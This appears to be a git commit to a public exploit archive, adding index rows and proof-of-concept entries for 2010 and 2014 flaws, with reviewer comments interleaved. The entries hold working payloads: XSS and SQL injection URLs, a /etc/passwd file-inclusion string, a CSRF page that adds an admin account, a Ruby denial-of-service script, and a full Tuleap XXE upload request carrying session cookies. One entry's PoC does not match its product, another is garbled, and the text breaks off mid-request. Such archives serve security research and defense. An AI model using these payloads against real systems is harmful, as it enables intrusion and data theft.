Updated 10_30_2014

This commit is contained in:
Offensive Security 2014-10-30 04:44:51 +00:00
parent 1709d70e04
commit 61f891edbd
21 changed files with 1592 additions and 1 deletions


@ -31573,7 +31573,7 @@ id,file,description,date,author,platform,type,port
35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal Vulnerability",2010-12-06,Pr0T3cT10n,windows,remote,0
35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0
35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution ""Sandworm"" Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Remote File Inclusion",2014-10-25,"Mauricio Correa",hardware,webapps,0
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"Mauricio Correa",hardware,webapps,0
35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0
35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0
35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0
@ -31594,9 +31594,29 @@ id,file,description,date,author,platform,type,port
35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 (.wav) - Buffer Overflow",2014-10-27,metacom,windows,local,0
35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0
35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass and Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80
35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation Vulnerability",2014-10-27,"Brandon Perry",jsp,webapps,8585
35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80
35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0
35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,1861
35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent XSS Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,0
35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter Cross Site Scripting Vulnerability",2010-12-07,"John Leitch",php,webapps,0
35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro 'showflat.pl' Cross Site Scripting Vulnerability",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0
35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 UPnP HTTP Request Remote Denial of Service Vulnerability.",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0
35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) 'admin1.template.php' Local and Remote File Include Vulnerabilities",2010-12-09,"Marcin Ressel",php,webapps,0
35088,platforms/php/webapps/35088.txt,"PHP State 'id' Parameter SQL Injection Vulnerability",2010-12-09,jos_ali_joe,php,webapps,0
35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr 'id' Parameter SQL Injection Vulnerability",2010-12-09,FL0RiX,php,webapps,0
35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection Vulnerability",2010-12-10,FL0RiX,php,webapps,0
35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0
35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross Site Request Forgery Vulnerability",2010-12-10,"John Leitch",multiple,remote,0
35093,platforms/cgi/webapps/35093.txt,"BizDir v.05.10 'f_srch' Parameter Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha 'top.php' Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
35096,platforms/php/webapps/35096.txt,"Joomla! 'com_mailto' Component Multiple Cross Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
35097,platforms/php/webapps/35097.txt,"Joomla Redirect Component 1.5.19 'com_redirect' Local File Include Vulnerability",2010-12-13,jos_ali_joe,php,webapps,0
35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0
35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
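Review bot: The description for the Allegro RomPager row (35086) ends with a trailing period, `"Allegro RomPager 4.07 UPnP HTTP Request Remote Denial of Service Vulnerability."`, which no other description in either hunk carries; dropping the period keeps the `description` column consistent with the rest of the index. This rendering does not mark which 20 of the 29 printed rows in the second hunk are the additions, so I am reading the index change only from the row text. The rest of the added rows follow the existing column layout.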



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45303/info
WWWThread is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
WWWThread 5.0.8 Pro is vulnerable; other versions may also be affected.
http://www.example.com/cgi-bin/forum/showflat.pl?Cat=&Board=forum&Number=111&page=0&view="<XSS>expanded&sb=1&part=all&vc=1
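Review bot: This entry records the BID summary and a single proof-of-concept URL but no remediation or fixed-version information, and the same holds for the other BID-derived entries added by this commit (35093, 35086, 35092, 35084, 35087, 35088, 35089, 35090, 35091, 35094, 35096 and 35097); only 35095 carries a "This issue is fixed in" block, and the Portcullis entries 35098/35099 a "Fixed version" line. The source BIDs normally state vendor fix status, so a one-line `Fix: <vendor advisory or fixed version, from the BID>` after the affected-version line would make these entries usable for defenders triaging an asset inventory rather than only as PoC references. I am not restating the BID content here since it is not on the page.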


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45342/info
BizDir is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
BizDir v.05.10 is vulnerable; other versions may also be affected.
http://www.example.com/cgi-bin/bizdir/bizdir.cgi?f_mode=srch& f_srch=<XSS inj>&f_srch_mode=SOME&f_start_at=1


@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/45353/info
Mozilla Firefox, SeaMonkey, and Thunderbird are prone to multiple HTML-injection vulnerabilities.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
This issue is fixed in:
Firefox 3.6.13
Firefox 3.5.16
SeaMonkey 2.0.11
x-mac-farsi exploit: <meta charset="x-mac-farsi">?script ?alert(1)//?/script ?
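Review bot: The proof-of-concept line has lost its non-ASCII bytes: every character that is specific to the x-mac-farsi charset was replaced by `?` during encoding, so `?script ?alert(1)//?/script ?` as committed no longer carries the vector the advisory describes and the entry cannot be reproduced from this file. The file should be re-imported with its original encoding preserved, and a short comment before that line noting that the vector depends on the `<meta charset="x-mac-farsi">` decoding would help readers who otherwise see only question marks.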

24
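--- a/platforms/multiple/dos/35086.rb
+++ b/platforms/multiple/dos/35086.rb
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/45309/info
+Allegro RomPager is prone to a remote denial-of-service vulnerability.
+Successfully exploiting this issue allows remote attackers to reboot affected devices, resulting in a denial-of-service condition.
+require 'net/https'
+url = URI.parse("http://IP/")
+data = nil
+headers = {
+"Host" => "IP",
+"Authorization" => "Basic
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+}
+res = Net::HTTP.start(url.host, url.port) do |http|
+http.use_ssl = false
+http.send_request("GET", url.path, data, headers)
+end
+puts res.body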
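Review bot: `http.use_ssl = false` at the top of the `Net::HTTP.start` block is a no-op: the session is already open when the block runs and `use_ssl=` cannot change the mode of a started session (it raises `IOError` if the value differs), so the line should either go or move into the call as `Net::HTTP.start(url.host, url.port, use_ssl: false)`. `require 'net/https'` is the legacy spelling; current Ruby wants `require 'net/http'` plus `require 'uri'` for `URI.parse`. Separately, the three advisory lines at the top of the file are bare text rather than `#` comments, so unless the lines omitted from this rendering hold a `=begin`/`=end` pair the file does not parse as Ruby. The `"Host" => "IP"` header and the `"http://IP/"` URL are placeholders that should be marked as such in a comment.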


@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/45340/info
Helix Server is prone to a cross-site request-forgery vulnerability.
An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site.
Helix Server 14.0.1.571 is vulnerable; other versions may also be affected.
<html>
<body>
<img src="http://www.example.com/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
</body>
</html>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45294/info
The Twitter Feed Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Twitter Feed 0.3.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wp-twitter-feed/magpie/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45312/info
The 'net2ftp' program is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to obtain sensitive information; other attacks are also possible.
net2ftp 0.98 stable is vulnerable; other versions may also be affected.
http://www.example.com/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45328/info
PHP State is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/state.php?id=37+union+select+1,2,3,4,5,6,7,concat_ws (0x3a,user(),database(),versi(),@version_compile_os),8,9,10,11- josalijoe -


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45329/info
Joomla Jeformcr is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_jeformcr&view=form&id=[SQLi]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45333/info
JExtensions Property Finder is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_jesectionfinder&view=sectiondetail&sf_id=[EXPLOIT]

18
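--- a/platforms/php/webapps/35091.txt
+++ b/platforms/php/webapps/35091.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/45334/info
+ManageEngine EventLog Analyzer is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+ManageEngine EventLog Analyzer 6.1 is vulnerable; other versions may also be affected.
+https://www.example.com/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E
+https://www.example.com/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
+https://www.example.com/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
+https://www.example.com/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E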
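Review bot: The four proof-of-concept URLs do not match the product named in the title: `pkg_edit.php?xml=olsrd.xml`, `pkg.php?xml=jailctl.xml`, `status_graph.php?if=` and `interfaces.php?if=wan` are page names and parameters of the pfSense web GUI, and ManageEngine EventLog Analyzer is, as far as I know, not a PHP application at all. The body looks mis-filed against BID 45334 and should be checked against the source advisory before the index row (`35091,platforms/php/webapps/35091.txt,...,php,webapps`) is published, since the platform classification depends on it. If the URLs are confirmed to belong to a different product, the entry needs either the correct PoC or a corrected title and platform.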


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45343/info
slickMsg is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
slickMsg 0.7-alpha is vulnerable; other versions may also be affected.
http://www.example.com/slickmsg/views/Thread/display/top.php?title=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/45356/info
The 'com_mailto' component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
" style="xss:expression(alert(document.cookie))
In fields: E-mail to, Sender, Your E-mail, Subject.


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45364/info
The 'com_redirect' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
Joomla Redirect 1.5.19 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?option=com_redirect&view=../../../../../../../../../etc/passwd%00

36
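--- a/platforms/php/webapps/35098.txt
+++ b/platforms/php/webapps/35098.txt
@@ -0,0 +1,36 @@
+Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
+CVE: CVE-2014-7176
+Vendor: Enalean
+Product: Tuleap
+Affected version: 7.4.99.5 and earlier
+Fixed version: 7.5
+Reported by: Jerzy Kramarz
+Details:
+SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
+GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
+Host: 192.168.56.108
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://192.168.56.108/plugins/docman/?group_id=100
+Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
+Connection: keep-alive
+Note: In order to exploit this vulnerability a attacker needs to be in position to access '/plugins/docman/' URN.
+Further details at:
+https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+Disclaimer:
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.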
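Review bot: The captured request carries session material verbatim, `Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96`, together with the lab host `192.168.56.108` in `Host:` and `Referer:`; these belong behind placeholders such as `[session]` and `[ip]`, as the companion entry 35099 already does for its host (though it too keeps its cookie values). Only the `global_txt` parameter is relevant to the finding, so the remaining headers could be trimmed to the request line, `Host:` and `Cookie:` without losing anything. Two wording issues in the note line: `a attacker` should be `an attacker`, and `'/plugins/docman/' URN` describes a URL path, not a URN.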

888
platforms/php/webapps/35099.txt Executable file

@ -0,0 +1,888 @@
Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz
Details:
A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.
Vulnerability 1:
1) Upload a XXE using the following request:
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25777276834778
Content-Length: 10561
-----------------------------25777276834778
Content-Disposition: form-data; name="group_id"
102
-----------------------------25777276834778
Content-Disposition: form-data; name="func"
docreate
-----------------------------25777276834778
Content-Disposition: form-data; name="group_id_template"
100
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_prjname"
Commencez à taper
-----------------------------25777276834778
Content-Disposition: form-data; name="create_mode"
xml
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml"
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
<name>123&xxe;</name>
<item_name>e123&xxe;</item_name>
<description>123&xxe;</description>
<cannedResponses/>
<formElements>
<formElement type="file" ID="F1" rank="0" use_it="0">
<name>attachment</name>
<label>Attachments</label>
</formElement>
<formElement type="text" ID="F2" rank="2" use_it="0">
<name>details</name>
<label>Original Submission</label>
<description>A full description of the artifact&xxe;</description>
<properties rows="7" cols="60"/>
</formElement>
<formElement type="string" ID="F3" rank="4" use_it="0" required="1">
<name>summary</name>
<label>Summary</label>
<description>One line description of the artifact&xxe;</description>
<properties maxchars="150" size="60"/>
</formElement>
<formElement type="tbl" ID="F4" rank="6" use_it="0">
<name>cc</name>
<label>CC</label>
<properties hint="Type in a search term"/>
<bind type="static" is_rank_alpha="0"/>
</formElement>
<formElement type="sb" ID="F7" rank="12" use_it="0">
<name>status_id</name>
<label>Status</label>
<description>Artifact Status</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F7-V0" label="Open">
<description>The artifact has been submitted&xxe;</description>
</item>
<item ID="F7-V1" label="Closed">
<description>The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe;</description>
</item>
</items>
</bind>
</formElement>
<formElement type="sb" ID="F8" rank="14" use_it="0">
<name>assigned_to</name>
<label>Assigned to</label>
<description>Who is in charge of solving the artifact&xxe;</description>
<bind type="users">
<items>
<item label="group_members"/>
</items>
</bind>
</formElement>
<formElement type="sb" ID="F11" rank="20" use_it="0">
<name>category_id</name>
<label>Category</label>
<description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
<bind type="static" is_rank_alpha="0"/>
</formElement>
<formElement type="sb" ID="F12" rank="22" use_it="0">
<name>severity</name>
<label>Priority</label>
<description>How quickly the artifact must be completed</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F12-V0" label="1 - Lowest"/>
<item ID="F12-V1" label="2"/>
<item ID="F12-V2" label="3"/>
<item ID="F12-V3" label="4"/>
<item ID="F12-V4" label="5 - Medium"/>
<item ID="F12-V5" label="6"/>
<item ID="F12-V6" label="7"/>
<item ID="F12-V7" label="8"/>
<item ID="F12-V8" label="9 - Highest"/>
</items>
<decorators>
<decorator REF="F12-V0" r="255" g="255" b="204"/>
<decorator REF="F12-V1" r="255" g="255" b="102"/>
<decorator REF="F12-V2" r="255" g="204" b="0"/>
<decorator REF="F12-V3" r="255" g="153" b="0"/>
<decorator REF="F12-V4" r="255" g="102" b="0"/>
<decorator REF="F12-V5" r="255" g="51" b="0"/>
<decorator REF="F12-V6" r="204" g="51" b="0"/>
<decorator REF="F12-V7" r="153" g="0" b="0"/>
<decorator REF="F12-V8" r="51" g="0" b="0"/>
</decorators>
</bind>
</formElement>
<formElement type="sb" ID="F13" rank="24" use_it="0">
<name>stage&xxe;</name>
<label>Stage&xxe;</label>
<description>Stage in the life cycle of the artifact&xxe;</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F13-V0" label="New">
<description>The artifact has just been submitted</description>
</item>
<item ID="F13-V1" label="Analyzed">
<description>The cause of the artifact has been identified and documented</description>
</item>
<item ID="F13-V2" label="Accepted">
<description>The artifact will be worked on.</description>
</item>
<item ID="F13-V3" label="Under Implementation">
<description>The artifact is being worked on.</description>
</item>
<item ID="F13-V4" label="Ready for Review">
<description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
</item>
<item ID="F13-V5" label="Ready for Test">
<description>Updated/Created software is ready to be included in the next build</description>
</item>
<item ID="F13-V6" label="In Test">
<description>Updated/Created software is in the build and is ready to enter the test phase</description>
</item>
<item ID="F13-V7" label="Approved">
<description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
</item>
<item ID="F13-V8" label="Declined">
<description>The artifact was not accepted.</description>
</item>
<item ID="F13-V9" label="Done">
<description>The artifact is closed.</description>
</item>
</items>
</bind>
</formElement>
</formElements>
<semantics>
<semantic type="tooltip"/>
</semantics>
<reports>
<report is_default="0">
<name>Default</name>
<description>The system default artifact report</description>
<criterias/>
<renderers>
<renderer type="table" rank="0" chunksz="15" multisort="15">
<name>Results</name>
<columns/>
</renderer>
<renderer type="plugin_graphontrackersv5" rank="1">
<name>Default</name>
<description>Graphic Report By Default For Support Requests</description>
<charts/>
</renderer>
</renderers>
</report>
</reports>
<workflow/>
<permissions>
<permission scope="field" REF="F1" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F1" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F1" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F2" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F2" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F3" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F3" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F4" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F4" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F4" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F7" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F7" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F7" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F12" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F12" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F12" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
</permissions>
</tracker>
-----------------------------25777276834778
Content-Disposition: form-data; name="name"
123
-----------------------------25777276834778
Content-Disposition: form-data; name="description"
123
-----------------------------25777276834778
Content-Disposition: form-data; name="itemname"
e123
-----------------------------25777276834778
Content-Disposition: form-data; name="Create"
Créer
-----------------------------25777276834778--
2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:
https://[ip]/plugins/tracker/?group_id=102&tracker=11
3) Using retrieved tracker number, a XXE can be trigerred by visiting the following URL:
https://[ip]/plugins/tracker/?tracker=11&func=admin-formElements
Vulnerability 2
1) Upload a XXE using the following request:
<
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12077103611061
Content-Length: 25588
-----------------------------12077103611061
Content-Disposition: form-data; name="group_id"
102
-----------------------------12077103611061
Content-Disposition: form-data; name="func"
docreate
-----------------------------12077103611061
Content-Disposition: form-data; name="group_id_template"
100
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_prjname"
Commencez à taper
-----------------------------12077103611061
Content-Disposition: form-data; name="create_mode"
xml
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml"
Content-Type: text/xml
<?xml version="1.0"?>
